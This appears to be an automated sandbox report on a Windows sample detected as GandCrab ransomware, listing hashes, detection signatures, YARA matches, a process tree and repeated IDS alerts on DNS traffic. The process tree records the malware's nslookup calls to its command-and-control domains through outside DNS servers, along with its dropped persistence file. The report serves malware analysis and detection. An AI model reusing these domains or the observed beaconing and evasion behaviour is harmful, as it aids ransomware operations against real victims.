
Windows Analysis Report
gI5xZdIxUs.exe

Overview

General Information

Sample Name:gI5xZdIxUs.exe
Analysis ID:694566
MD5:98a12ec721c098842fbfd7384d5a72ae
SHA1:9dfd7d1746c8ae943f3dced0f85f0e3c6f5084f3
SHA256:f83457d173841c7e944bc60b00c197ca93c864893c71902cf1b1a36decdd30a4
Tags:exe

Detection

Gandcrab, ReflectiveLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Gandcrab
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected ReflectiveLoader
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Snort IDS alert for network traffic
Contains functionality to determine the online IP of the system
Found Tor onion address
Uses nslookup.exe to query domains
Machine Learning detection for sample
May check the online IP address of the machine
Performs many domain queries via nslookup
Machine Learning detection for dropped file
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Queries information about the installed CPU (vendor, model number etc)
Drops PE files
Contains functionality to read the PEB
Found evaded block containing many API calls
Contains functionality to enumerate device drivers
Checks for available system drives (often done to infect USB drives)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • gI5xZdIxUs.exe (PID: 5280 cmdline: "C:\Users\user\Desktop\gI5xZdIxUs.exe" MD5: 98A12EC721C098842FBFD7384D5A72AE)
    • nslookup.exe (PID: 5960 cmdline: nslookup nomoreransom.coin dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 4684 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 4596 cmdline: nslookup gandcrab.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 6112 cmdline: nslookup nomoreransom.coin dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 4624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 1916 cmdline: nslookup nomoreransom.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5244 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 6028 cmdline: nslookup nomoreransom.coin dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5116 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 680 cmdline: nslookup gandcrab.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5124 cmdline: nslookup nomoreransom.coin dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 4972 cmdline: nslookup nomoreransom.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5604 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 736 cmdline: nslookup nomoreransom.coin dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 4460 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 4560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 6052 cmdline: nslookup gandcrab.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5424 cmdline: nslookup nomoreransom.coin dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 4364 cmdline: nslookup nomoreransom.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 5188 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 1960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 1164 cmdline: nslookup nomoreransom.coin dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 1092 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • nslookup.exe (PID: 968 cmdline: nslookup gandcrab.bit dns2.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)
      • conhost.exe (PID: 5636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • isqmkp.exe (PID: 5464 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe" MD5: F4758788F11A0DE8D11EB4B8C515FFBD)
  • isqmkp.exe (PID: 1572 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe" MD5: F4758788F11A0DE8D11EB4B8C515FFBD)
  • cleanup
No configs have been found
Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
gI5xZdIxUs.exe | ReflectiveLoader | Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended | Florian Roth | 0xed22:$x1: ReflectiveLoader
gI5xZdIxUs.exe | SUSP_RANSOMWARE_Indicator_Jul20 | Detects ransomware indicator | Florian Roth | 0xe67e:$: DECRYPT.txt; 0xe6e4:$: DECRYPT.txt
gI5xZdIxUs.exe | JoeSecurity_Gandcrab | Yara detected Gandcrab | Joe Security | -
gI5xZdIxUs.exe | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security | -
gI5xZdIxUs.exe | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0xed21:$s1: _ReflectiveLoader@; 0xed22:$s2: ReflectiveLoader@

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | ReflectiveLoader | Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended | Florian Roth | 0xed22:$x1: ReflectiveLoader
C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | SUSP_RANSOMWARE_Indicator_Jul20 | Detects ransomware indicator | Florian Roth | 0xe67e:$: DECRYPT.txt; 0xe6e4:$: DECRYPT.txt
C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | JoeSecurity_Gandcrab | Yara detected Gandcrab | Joe Security | -
C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security | -
C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0xed21:$s1: _ReflectiveLoader@; 0xed22:$s2: ReflectiveLoader@

Memory Dumps

Source | Rule | Description | Author | Strings
00000014.00000000.322631215.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security | -
0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security | -
0000000E.00000000.307654244.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp | JoeSecurity_Gandcrab | Yara detected Gandcrab | Joe Security | -
00000001.00000000.272296797.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security | -
0000000E.00000000.307645700.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security | -

Unpacked PEs

Source | Rule | Description | Author | Strings
14.2.isqmkp.exe.f9d0000.0.unpack | ReflectiveLoader | Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended | Florian Roth | 0xed22:$x1: ReflectiveLoader
14.2.isqmkp.exe.f9d0000.0.unpack | SUSP_RANSOMWARE_Indicator_Jul20 | Detects ransomware indicator | Florian Roth | 0xe67e:$: DECRYPT.txt; 0xe6e4:$: DECRYPT.txt
14.2.isqmkp.exe.f9d0000.0.unpack | JoeSecurity_Gandcrab | Yara detected Gandcrab | Joe Security | -
14.2.isqmkp.exe.f9d0000.0.unpack | JoeSecurity_ReflectiveLoader | Yara detected ReflectiveLoader | Joe Security | -
14.2.isqmkp.exe.f9d0000.0.unpack | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0xed21:$s1: _ReflectiveLoader@; 0xed22:$s2: ReflectiveLoader@
Sigma Overview

No Sigma rule has matched
                        Timestamp:192.168.2.38.8.8.860754532829498 08/31/22-23:58:43.044195
                        SID:2829498
                        Source Port:60754
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.850789532829498 08/31/22-23:59:48.239260
                        SID:2829498
                        Source Port:50789
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858305532829498 08/31/22-23:59:32.365598
                        SID:2829498
                        Source Port:58305
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865389532829498 08/31/22-23:59:40.892307
                        SID:2829498
                        Source Port:65389
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.849203532026737 08/31/22-23:59:56.322889
                        SID:2026737
                        Source Port:49203
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.856952532026737 08/31/22-23:58:46.555077
                        SID:2026737
                        Source Port:56952
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853051532829498 08/31/22-23:59:12.297576
                        SID:2829498
                        Source Port:53051
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853431532829498 08/31/22-23:59:18.287185
                        SID:2829498
                        Source Port:53431
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865022532829498 08/31/22-23:58:54.690068
                        SID:2829498
                        Source Port:65022
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.861420532829498 08/31/22-23:59:01.493233
                        SID:2829498
                        Source Port:61420
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.851994532829498 08/31/22-23:59:24.206869
                        SID:2829498
                        Source Port:51994
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860478532829498 08/31/22-23:59:59.939438
                        SID:2829498
                        Source Port:60478
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865019532829498 08/31/22-23:58:54.630989
                        SID:2829498
                        Source Port:65019
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.850230532026737 09/01/22-00:00:07.433896
                        SID:2026737
                        Source Port:50230
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860093532026737 08/31/22-23:59:14.413883
                        SID:2026737
                        Source Port:60093
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858122532026737 08/31/22-23:59:27.247839
                        SID:2026737
                        Source Port:58122
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865515532026737 08/31/22-23:59:20.761806
                        SID:2026737
                        Source Port:65515
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.852958532829498 08/31/22-23:58:07.331283
                        SID:2829498
                        Source Port:52958
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.854156532026737 08/31/22-23:59:42.281210
                        SID:2026737
                        Source Port:54156
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865110532829498 08/31/22-23:58:33.358759
                        SID:2829498
                        Source Port:65110
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853430532829498 08/31/22-23:59:18.269254
                        SID:2829498
                        Source Port:53430
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858121532026737 08/31/22-23:59:27.189978
                        SID:2026737
                        Source Port:58121
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865021532829498 08/31/22-23:58:54.669703
                        SID:2829498
                        Source Port:65021
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858306532829498 08/31/22-23:59:32.396919
                        SID:2829498
                        Source Port:58306
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.864126532026737 08/31/22-23:59:50.649034
                        SID:2026737
                        Source Port:64126
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858695532026737 08/31/22-23:58:36.600606
                        SID:2026737
                        Source Port:58695
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.861418532829498 08/31/22-23:59:01.454658
                        SID:2829498
                        Source Port:61418
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865516532026737 08/31/22-23:59:20.780161
                        SID:2026737
                        Source Port:65516
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865111532829498 08/31/22-23:58:33.379307
                        SID:2829498
                        Source Port:65111
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865388532829498 08/31/22-23:59:40.874321
                        SID:2829498
                        Source Port:65388
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858694532026737 08/31/22-23:58:36.580328
                        SID:2026737
                        Source Port:58694
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.854155532026737 08/31/22-23:59:42.262891
                        SID:2026737
                        Source Port:54155
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.852957532829498 08/31/22-23:58:07.312591
                        SID:2829498
                        Source Port:52957
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.849204532026737 08/31/22-23:59:56.342973
                        SID:2026737
                        Source Port:49204
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860586532026737 08/31/22-23:58:15.043750
                        SID:2026737
                        Source Port:60586
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.850231532026737 09/01/22-00:00:07.455721
                        SID:2026737
                        Source Port:50231
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.852959532829498 08/31/22-23:58:07.365561
                        SID:2829498
                        Source Port:52959
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.862054532829498 08/31/22-23:58:21.744663
                        SID:2829498
                        Source Port:62054
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.859641532026737 08/31/22-23:58:24.944174
                        SID:2026737
                        Source Port:59641
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.859638532026737 08/31/22-23:58:24.884406
                        SID:2026737
                        Source Port:59638
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865198532026737 08/31/22-23:59:03.441447
                        SID:2026737
                        Source Port:65198
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865109532829498 08/31/22-23:58:33.338202
                        SID:2829498
                        Source Port:65109
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.852457532829498 09/01/22-00:00:11.310934
                        SID:2829498
                        Source Port:52457
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860587532026737 08/31/22-23:58:15.064663
                        SID:2026737
                        Source Port:60587
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853470532026737 08/31/22-23:58:56.772805
                        SID:2026737
                        Source Port:53470
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.856620532026737 09/01/22-00:00:02.142088
                        SID:2026737
                        Source Port:56620
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858693532026737 08/31/22-23:58:36.550637
                        SID:2026737
                        Source Port:58693
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.858696532026737 08/31/22-23:58:36.619047
                        SID:2026737
                        Source Port:58696
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.856954532026737 08/31/22-23:58:46.594398
                        SID:2026737
                        Source Port:56954
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.849205532026737 08/31/22-23:59:56.360951
                        SID:2026737
                        Source Port:49205
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.856619532026737 09/01/22-00:00:02.120945
                        SID:2026737
                        Source Port:56619
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.851995532829498 08/31/22-23:59:24.227191
                        SID:2829498
                        Source Port:51995
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.861421532829498 08/31/22-23:59:01.511754
                        SID:2829498
                        Source Port:61421
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.852960532829498 08/31/22-23:58:07.384051
                        SID:2829498
                        Source Port:52960
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.865390532829498 08/31/22-23:59:40.910653
                        SID:2829498
                        Source Port:65390
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.853053532829498 08/31/22-23:59:12.348894
                        SID:2829498
                        Source Port:53053
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.854158532026737 08/31/22-23:59:42.322126
                        SID:2026737
                        Source Port:54158
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.860753532829498 08/31/22-23:58:43.024087
                        SID:2829498
                        Source Port:60753
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.38.8.8.857391532829498 09/01/22-00:00:05.158775
                        SID:2829498
                        Source Port:57391
                        Destination Port:53
                        Protocol:UDP
                        Classtype:A Network Trojan was detected
                        Timestamp                 SID      Source -> Destination            Protocol  Classtype
                        08/31/22-23:59:32.323930  2829498  192.168.2.3:58303 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:15.004694  2026737  192.168.2.3:60584 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:27.268863  2026737  192.168.2.3:58123 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:14.371988  2026737  192.168.2.3:60091 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:03.482704  2026737  192.168.2.3:65200 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:18.325585  2829498  192.168.2.3:53433 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:48.189200  2829498  192.168.2.3:50787 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:42.984219  2829498  192.168.2.3:60751 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:48.168544  2829498  192.168.2.3:50786 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:56.731128  2026737  192.168.2.3:53468 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:56.381031  2026737  192.168.2.3:49206 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:59.877731  2829498  192.168.2.3:60475 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:36.563649  2026737  192.168.2.3:63448 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:24.265731  2829498  192.168.2.3:51997 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        09/01/22-00:00:02.100951  2026737  192.168.2.3:56618 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:56.793274  2026737  192.168.2.3:53471 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:12.369224  2829498  192.168.2.3:53054 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        09/01/22-00:00:11.330853  2829498  192.168.2.3:52458 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:20.720500  2026737  192.168.2.3:65513 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:53.952246  2829498  192.168.2.3:60828 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:50.605079  2026737  192.168.2.3:64124 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:21.699516  2829498  192.168.2.3:62052 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        09/01/22-00:00:05.138814  2829498  192.168.2.3:57390 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        09/01/22-00:00:07.502496  2026737  192.168.2.3:50233 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:14.353291  2026737  192.168.2.3:60090 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        09/01/22-00:00:11.350932  2829498  192.168.2.3:52459 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:53.930680  2829498  192.168.2.3:60827 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:56.749513  2026737  192.168.2.3:53469 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        09/01/22-00:00:07.481526  2026737  192.168.2.3:50232 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:40.854236  2829498  192.168.2.3:65387 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:36.620733  2026737  192.168.2.3:63451 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:50.625202  2026737  192.168.2.3:64125 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:59.898864  2829498  192.168.2.3:60476 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:42.301537  2026737  192.168.2.3:54157 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        09/01/22-00:00:05.176878  2829498  192.168.2.3:57392 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        09/01/22-00:00:11.371195  2829498  192.168.2.3:52460 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        09/01/22-00:00:05.118977  2829498  192.168.2.3:57389 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:21.768917  2829498  192.168.2.3:56043 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:12.328339  2829498  192.168.2.3:53052 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:01.474961  2829498  192.168.2.3:61419 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:24.245596  2829498  192.168.2.3:51996 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:18.305428  2829498  192.168.2.3:53432 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:15.025136  2026737  192.168.2.3:60585 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:36.602428  2026737  192.168.2.3:63450 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:59:59.919053  2829498  192.168.2.3:60477 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:46.526858  2026737  192.168.2.3:56951 -> 8.8.8.8:53  UDP       A Network Trojan was detected
                        08/31/22-23:58:33.402809  2829498  192.168.2.3:65112 -> 8.8.8.8:53  UDP       A Network Trojan was detected
